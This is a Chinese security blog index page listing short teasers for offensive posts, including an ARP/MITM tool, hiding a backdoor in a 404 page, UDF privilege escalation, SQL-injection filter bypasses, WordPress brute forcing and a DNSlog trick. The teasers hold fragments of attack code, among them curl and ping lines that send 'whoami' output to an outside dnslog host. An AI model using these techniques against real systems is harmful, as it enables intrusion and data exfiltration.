安全博客 - 第 833 | CN-SEC 中文网

颓废's Blog

EvilFOCA –中间人/ARP嗅探攻击工具

DNS Hijacking. 项目首页： https://github.com/ElevenPaths/EvilFOCA 文件名稱：响应国家号召，禁止资源下...

05月19日1,455 views评论

阅读全文

颓废's Blog

利用404错误页面隐藏后门

先找一个404错误页面把源码复制下来保存到本地asp格式 <% if request("77169")="77169" then %> <title>77...

05月19日502 views评论

阅读全文

颓废's Blog

单个CMS识别工具

截图如下：主流的CMS识别只需要2秒钟源自于孤狼博客文件名稱：响应国家号召，禁止资源下载

05月19日582 views评论

阅读全文

F-NAScan网络资产信息扫描

正则为空时则运用端口进行匹配，否则以正则匹配成果为准。以上是效果图

05月19日颓废's Blog688 views评论

阅读全文

颓废's Blog

udf提权工具

java -jar udf.jar 127.0.0.1 root 123456 [32/64] 最后一个参数为可选参数，不填则默认是32位

05月19日636 views评论

阅读全文

11种绕过防注入的方法

1、运用编码技术绕过如URLEncode编码，ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+...

05月19日颓废's Blog462 views评论

阅读全文

wordperss 批量爆破（犀利）

1.参数化操作 2.内置两种暴力破解方式，通过wp-login模拟发包登录或者采用xmlrpc.php post数据包均可。

05月19日颓废's Blog447 views评论

阅读全文

颓废's Blog

Java反序列化集成利用工具

需要的自己去下载文件名稱：响应国家号召，禁止资源下载

05月19日868 views评论

阅读全文

Kali Linux中使用shutter截图工具

在Kali 2017以前的版本中默认有一款截图工具--screenshot，升级到2017版后找不到了，下面介绍一款同样好用的截图工具---shutter

05月19日颓废's Blog744 views评论

阅读全文

MySQL添加用户、删除用户与授权

MySql中添加用户,新建数据库,用户授权,删除用户,修改密码(注意每行后边都跟个;表示一个命令语句结束): 1.新建用户 1.1 登录MYSQL： @>mysql -u root -p @&g...

05月19日颓废's Blog456 views评论

阅读全文

DNSlog攻击技巧

linux： curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格（换...

05月19日颓废's Blog2,350 views评论

阅读全文

内存溢出和内存泄漏的区别

作者：monsterlin

05月19日颓废's Blog547 views评论

阅读全文

EvilFOCA –中间人/ARP嗅探攻击工具

利用404错误页面隐藏后门

单个CMS识别工具

F-NAScan网络资产信息扫描

udf提权工具

11种绕过防注入的方法

wordperss 批量爆破（犀利）

Java反序列化集成利用工具

Kali Linux中使用shutter截图工具

MySQL添加用户、删除用户与授权

DNSlog攻击技巧

内存溢出和内存泄漏的区别

在线咨询

微信